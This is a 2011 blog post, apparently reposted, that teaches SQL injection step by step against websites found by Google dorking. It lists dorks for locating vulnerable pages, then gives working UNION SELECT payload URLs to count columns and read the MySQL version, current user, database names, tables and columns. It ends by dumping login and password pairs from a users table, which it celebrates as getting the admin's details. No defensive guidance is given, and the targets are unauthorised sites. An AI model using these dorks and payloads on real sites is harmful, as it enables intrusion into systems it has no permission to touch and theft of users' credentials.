Subscribe via feed.

[Tutorial]: SQL injections part I

Posted by deepquest on June 27, 2011 – 4:43 pm

They are 1000’s of tutorial around sql injections, some of the tutorials I found were good, some bad, some too long. But finally found something interesting to share, a bit lazy to write my own not enought time for this.

Sql injection aka SQLi is way to manipulate url to inject SQL commands thru a url. Bad code = good SQLi.

Feel free to comment and feed back.

SQL  Injection

Right……… This is in depth tutorial with pics XD on how to do SQL injection correctly.

I take it you know what SQL injection is…. The basics I mean XD you wouldn’t be here otherwise would you?

Let’s get a cracking.

#1.Finding vulnerable sites
#2.Finding amount of columns
#3.Getting mysql version current user
#4.Getting Databases
#5.Getting Tables
#6.Getting Columns
#7.Getting Usernames and Passwords

Let’s do this mofo’s

#1.

You can’t SQL a site unless you first locate one, “How do we do this?”” Is the question rolling around your heads, Well…… We use something called a Dork “I beg your pardon, Do this mofo call me a dork” A Google dork XD,It’s what can be used in order to locate vulnerable sites through the google search engine.

A list of common used google dorks:
inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=

I’ve found my vulnerable site, Now wtf do I do……. Well the common answer to that question is to check if it’s vulnerable, In order to do this we add a ‘ at the end.

So for example:
http://examplesite.com/news/view.php?id=828

^ ^ That’s the site I found (Remember this is a example)

All we do is add a ‘
Like so:
http://examplesite.com/news/view.php?id=828’

We can add the ‘ before or after the numbers, It still checks if it is vulnberable.

How do I know if it’s vulnerable, Well you will see something like  this:
http://img220.imageshack.us/img220/6660/sqlitut1.jpg

Notice the SQL error? That is exactly what we are after, Now it’s time to move onto Step 2.

#2. Finding amount of columns
In order to find the ammount of columns we have to use a orderby statement, The concept behind it is pretty simple, We keep ordering by until a error is received, So….

http://examplesite.com/news/view.php?id=828 order by 1– (page loads normal)
http://examplesite.com/news/view.php?id=828 order by 2– (page loads normal)
http://examplesite.com/news/view.php?id=828 order by 3– (page loads normal)
http://examplesite.com/news/view.php?id=828 order by 4– (page loads normal)
http://examplesite.com/news/view.php?id=828 order by 5– (page loads normal)
http://examplesite.com/news/view.php?id=828 order by 6– (page loads normal)
http://examplesite.com/news/view.php?id=828 order by 7– (page loads normal)
http://examplesite.com/news/view.php?id=828 order by 8– (page loads normal)
http://examplesite.com/news/view.php?id=828 order by 9– (error)

(Don’t actually but the page loads normal part) I was just showing you how it shows a error)

Alright so we received a error on column 9, This means we have 8 columns, “But you received the error on 9?” Yes true, But every page before that loaded fine, So it’s 8 columns.

So you’ve found out how many columns it is now what is next?

Next is union select statements,

http://examplesite.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8–

(Make note of the hyphen before the numbers)

You should see numbers on the site like so:
http://img842.imageshack.us/img842/5738/sqlitut2.jpg

This proves to us, That this site is vulnerable to SQL injection, Now it’s time we #3 mofo’s XD.

#3. Getting MySQL version and Current User
So we’ve worked out the columns and displayed the column numbers on the screen, Next is getting the SQL version and the current user.

To do these we use this SQL command:
http://examplesite.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8–

(Make note that we’ve used column 3 to display the SQL version)
http://img823.imageshack.us/img823/8895/sqlitut3.jpg

5.0.22 this mofo site is vulnerable, (if its under 4 then you have to guess tables and columns) Majority are over 5 anyway.

Next, Let’s get the current user on this thing, To do that we type in:

http://examplesite.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8–

Notice the user() command? The same place in which we put @@version number before?

If you’ve done correctly you should see something like this:
http://img690.imageshack.us/img690/611/sqlitut4.jpg

Now comes the interesting stuff………. Let’s hit up part #4.

#4. Getting Databases
Now is the cool stuff we now want to get the database and the current database, To do this we use:

http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata–

Notice the group_concat(schema_name) is in number 3 again? This will display the information we are after:

http://img864.imageshack.us/img864/1689/sqlitut5.jpg

The current database, It’s pretty obvious but hey…. comes in handy XD,

To view the current database use this syntax:

http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8

You should receive something like this:
http://img194.imageshack.us/img194/7368/sqlitut6.jpg

Like I said, Pretty obvious haha

So we’ve worked out the database name, Now we want those mofo tables, Let’s move onto #5.

#5. Getting Tables
In order to get the tables we will continue using that handy union select command,

http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()–

Before we move on, I want you to study that syntax, take note of the commands used there, The database etc etc.

If you’ve done that correctly you should receive something like this:
http://img830.imageshack.us/img830/3971/sqlitut7.jpg

I’ve put a box round the user table, Cause well……. You don’t SQL a site without wanting to get the user table XD

Judging from the other tables, I can safely say the passwords and users will all be in the bpuser table, Scribble this name down and let’s move on to part #6.

#6. Getting Columns
So we’ve found our user table now we want the columns out of it, How do we do this you ask, Well… It’s pretty simple.

http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()–

As before, I want you to read through the syntax, Try and understand what everything is doing in there?

Right… If you have done that correctly, You should receive something like this:
http://img24.imageshack.us/img24/8813/sqlitut8.jpg

Notice the 2 tables I’ve highlighted? These contain the info we want for gaining access XD.

#7. Dumping users/pass
So you’ve found your site, Found the columns,database,tables etc etc now I bet you wanna pwn this mofo, So now we are going to dump the info from login and password, To do this we simply:

http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers–

Right this syntax is a lot more complex than the others, Therefore as before, Read through it and try to work out what is being done?

(NOTE: 0x3a will make a : between logins and passwords.)

If you’ve done this correctly you should receive something similar to this:
http://img145.imageshack.us/img145/4508/sqlitut9.jpg

YEAH!!!!!!! there is that mofo admin’s details.

Congratulations, You have now officially ‘parred’ the site, Now all is required is to find the admin page.

Tu
Enjoy and happy SQL ing


This post is under “Lulz, Security” and has 2 respond so far.
If you enjoy this article, make sure you subscribe to my RSS Feed.

2 Responds so far- Add one»

  1. 1. Assassin Said:

    hey my friend, do u use ubuntu or windows?

  2. 2. deepquest Said:

    what I use is not the problem, SQLi works from any plateforms.

Post a reply

You must be logged in to post a comment.